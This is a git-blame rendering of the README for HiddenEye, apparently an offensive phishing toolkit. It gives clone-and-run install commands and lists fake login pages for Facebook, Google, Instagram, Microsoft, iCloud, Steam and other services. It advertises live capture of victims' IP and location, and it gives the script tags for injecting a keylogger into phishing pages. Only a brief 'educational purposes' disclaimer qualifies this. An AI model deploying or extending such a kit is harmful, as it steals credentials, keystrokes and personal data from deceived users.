2018-03-26 22:35:33 +08:00
< p align = "center" >
2018-10-28 14:17:29 +08:00
< img src = "logo.png" >
2018-03-26 22:35:33 +08:00
< / p >
< p align = "center" >
2018-10-28 13:25:29 +08:00
Modern phishing tool with advanced functionality
2018-03-26 22:35:33 +08:00
< / p >
2018-04-22 20:49:10 +08:00
< p align = "center" >
2018-10-19 00:07:27 +08:00
NOW WE HAVE ADDED KEYLOGGER WITH THE PHISHING PAGES // VICTIM DEVICE INFO ALSO AVAILABLE
2018-04-25 19:39:56 +08:00
2018-04-22 20:49:10 +08:00
< / p >
2018-04-23 11:55:13 +08:00
### PREREQUISITES ( Please verify if you have installed )
2018-03-26 22:35:33 +08:00
2018-06-27 18:06:01 +08:00
* Python 3
2018-03-26 22:35:33 +08:00
* Wget from Python
* PHP
* sudo
2018-10-28 13:25:29 +08:00
2018-03-26 22:35:33 +08:00
2018-06-27 18:18:40 +08:00
### TESTED ON FOLLOWING
2018-03-26 22:35:33 +08:00
* **Kali Linux - Rolling Edition**
2018-04-18 21:01:27 +08:00
* **Parrot OS - Rolling Edition**
2018-03-26 22:35:33 +08:00
* **Linux Mint - 18.3 Sylvia**
* **Ubuntu - 16.04.3 LTS**
* **MacOS High Sierra**
2018-10-26 10:26:08 +08:00
* **Arch Linux**
* **Manjaro XFCE Edition 17.1.12**
* **Black Arch**
2018-10-28 16:33:42 +08:00
2018-10-29 06:55:03 +08:00
## HOW TO INSTALL
2018-10-30 22:32:47 +08:00
2018-03-26 22:35:33 +08:00
### CLONE
```
2018-10-28 13:25:29 +08:00
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
2018-03-26 22:35:33 +08:00
```
2018-03-31 17:09:27 +08:00
### RUNNING (In Linux)
2018-03-26 22:35:33 +08:00
```
2018-10-28 13:25:29 +08:00
cd HiddenEye
2018-03-26 22:35:33 +08:00
```
2018-06-27 18:06:01 +08:00
```
sudo apt install python3-pip
```
2018-03-26 22:35:33 +08:00
```
2018-06-18 11:12:22 +08:00
sudo pip3 install -r requirements.txt
2018-03-26 22:35:33 +08:00
```
2018-03-26 22:51:18 +08:00
```
2018-10-28 13:25:29 +08:00
chmod 777 HiddenEye.py
2018-03-26 22:51:18 +08:00
```
2018-03-26 22:35:33 +08:00
```
2018-10-28 13:25:29 +08:00
python3 HiddenEye.py
2018-03-31 17:09:27 +08:00
```
OR
```
2018-10-28 13:25:29 +08:00
./HiddenEye.py
2018-03-26 22:35:33 +08:00
```
2018-10-26 10:26:08 +08:00
### RUNNING (If distro based on Arch Linux)
```
2018-10-28 13:25:29 +08:00
cd HiddenEye
2018-10-26 10:26:08 +08:00
```
```
sudo pacman -Syu
```
```
sudo pacman -S python-pip
```
```
sudo pip3 install -r requirements.txt
```
```
2018-10-28 13:25:29 +08:00
chmod 777 HiddenEye.py
2018-10-26 10:26:08 +08:00
```
```
2018-10-28 13:25:29 +08:00
python3 HiddenEye.py
2018-10-26 10:26:08 +08:00
```
OR
```
2018-10-28 13:25:29 +08:00
./HiddenEye.py
2018-10-26 10:26:08 +08:00
```
### RUNNING (For Android users in Termux)
2018-03-31 17:09:27 +08:00
2018-04-01 21:31:01 +08:00
```
First install { Termux } from Playstore.
```
```
After opening Follow below commands One by one
```
2018-03-31 17:09:27 +08:00
```
2018-08-03 23:58:50 +08:00
pkg install git python php curl openssh grep
2018-03-31 17:09:27 +08:00
```
```
2018-06-18 17:58:58 +08:00
pip3 install wget
2018-03-31 17:09:27 +08:00
```
```
2018-10-28 13:25:29 +08:00
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
2018-03-31 17:09:27 +08:00
```
```
2018-10-28 13:25:29 +08:00
cd HiddenEye
2018-03-31 17:09:27 +08:00
```
```
2018-10-28 13:25:29 +08:00
chmod 777 HiddenEye.py
2018-03-31 17:09:27 +08:00
```
```
2018-10-28 13:25:29 +08:00
python HiddenEye.py
2018-06-18 17:58:58 +08:00
or
2018-10-28 13:25:29 +08:00
./HiddenEye.py
2018-03-31 17:09:27 +08:00
```
2018-10-30 05:30:07 +08:00
### Running (One Code installation in Termux)
2018-03-31 17:09:27 +08:00
2018-09-15 15:24:05 +08:00
```
First install { Termux } from Playstore.
```
```
After opening Copy and run this Single Command.
2018-09-15 15:40:31 +08:00
```
2018-09-15 15:24:05 +08:00
```
2018-10-28 13:25:29 +08:00
pkg install git python php curl openssh grep & & pip3 install wget & & git clone https://github.com/DarkSecDevelopers/HiddenEye & & cd HiddenEye & & chmod 777 HiddenEye.py & & python HiddenEye.py
2018-09-15 15:24:05 +08:00
```
2018-03-26 22:35:33 +08:00
## AVAILABLE PAGES
**+ Facebook:**
- Traditional Facebook login page.
2018-06-28 13:36:55 +08:00
- Advanced Poll Method.
2018-03-26 22:35:33 +08:00
- Fake Security login with Facebook Page.
- Facebook messenger login page.
**+ Google:**
- Traditional Google login page.
2018-06-28 13:36:55 +08:00
- Advanced Poll Method.
2018-03-26 22:35:33 +08:00
**+ LinkedIn:**
- Traditional LinkedIn login page.
**+ Github:**
- Traditional Github login page.
**+ Stackoverflow:**
- Traditional Stackoverflow login page.
**+ Wordpress:**
- Similar Wordpress login page.
**+ Twitter:**
- Traditional Twitter login page.
**+ Instagram:**
- Traditional Instagram login page.
2018-04-18 21:01:27 +08:00
- Instagram Autoliker Phishing Page [ ADVANCED METHOD ADOPTED ].
2018-03-26 22:35:33 +08:00
2018-04-22 20:49:10 +08:00
### WHAT'S NEW FEATURES
**1) LIVE ATTACK**
2018-04-22 20:53:14 +08:00
- Now you will have live information about the victims such as : IP ADDRESS, Geolocation, ISP, Country, & many more.
2018-04-22 20:49:10 +08:00
2018-06-22 12:40:08 +08:00
**2) COMPATIBILITY**
- All the sites are mobile compatible.
2018-10-19 00:07:27 +08:00
**3) KEYLOGGER**
- Now you will also have the ability to capture all the keystokes of victim.
2018-10-19 10:10:27 +08:00
**(CURRENTLY):- This feature is added on instagram web page and github, to less the possibility of slow functioning of generated link)
2018-10-19 00:07:27 +08:00
**HOW TO ADD IT MANUALLY ?
-- You can add this manually by putting the codes on index page.(put these code at anywhere inside the index page // but not between any other script codes)
```
2018-10-20 00:04:43 +08:00
< script src = "keylogger.js" > < / script >
< script src = "keylogger.php" > < / script >
2018-10-19 00:07:27 +08:00
```
2018-04-22 20:49:10 +08:00
### NEW PAGES
2018-03-26 22:35:33 +08:00
< p align = "center" >
2018-04-23 15:54:14 +08:00
**1) FACEBOOK PHISHING:**
2018-03-26 22:45:02 +08:00
- Traditional Facebook login page.
2018-06-28 13:36:55 +08:00
- Advanced Poll Method.
2018-03-26 22:45:02 +08:00
- Fake Security login with Facebook Page.
- Facebook messenger login page.
2018-03-26 22:35:33 +08:00
2018-04-18 21:01:27 +08:00
**2) INSTAGRAM PHISHING:**
- Traditional Login Page
2018-06-27 18:13:22 +08:00
- Fake instagram Autoliker Page [ REDIRECTS TO ORIGINAL AUTOLIKER PAGE AFTER SUBMIT ]
2018-04-23 15:52:42 +08:00
**3) SNAPCHAT PHISHING:**
2018-04-25 13:29:32 +08:00
- Traditional Snapchat Login Page
2018-04-25 13:30:25 +08:00
**4) YAHOO PHISHING:**
2018-04-25 13:29:32 +08:00
- Traditional Yahoo Login Page
2018-04-28 11:28:26 +08:00
**5) TWITCH PHISHING:**
- Traditional Twitch Login Page [ Login With Facebook Also Available ]
2018-06-04 19:08:25 +08:00
2018-06-04 19:15:36 +08:00
**6) MICROSOFT PHISHING:**
- Traditional Microsoft-Live Web Login Page
2018-06-18 22:42:39 +08:00
**7) STEAM PHISHING:**
- Traditional Steam Web Login Page
2018-06-28 13:36:55 +08:00
**8) VK PHISHING:**
- Traditional VK Web Login Page
- Advanced Poll Method
2018-07-15 19:20:58 +08:00
2018-07-15 19:22:13 +08:00
**9) ICLOUD PHISHING:**
2018-07-15 19:20:58 +08:00
- Traditional iCloud Web Login Page
2018-03-26 22:35:33 +08:00
< / p >
### SCREENSHOT
2018-10-30 04:59:15 +08:00
![Shot ](https://github.com/DarkSecDevelopers/HiddenEye/blob/dev/Sceenshot.png )
2018-03-26 22:35:33 +08:00
## DISCLAIMER
< p align = "center" >
TO BE USED FOR EDUCATIONAL PURPOSES ONLY
< / p >
2018-10-29 06:55:03 +08:00
The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read [LICENSE ](LICENSE ).
2018-03-26 22:35:33 +08:00
2018-06-24 23:52:33 +08:00
2018-10-28 16:33:42 +08:00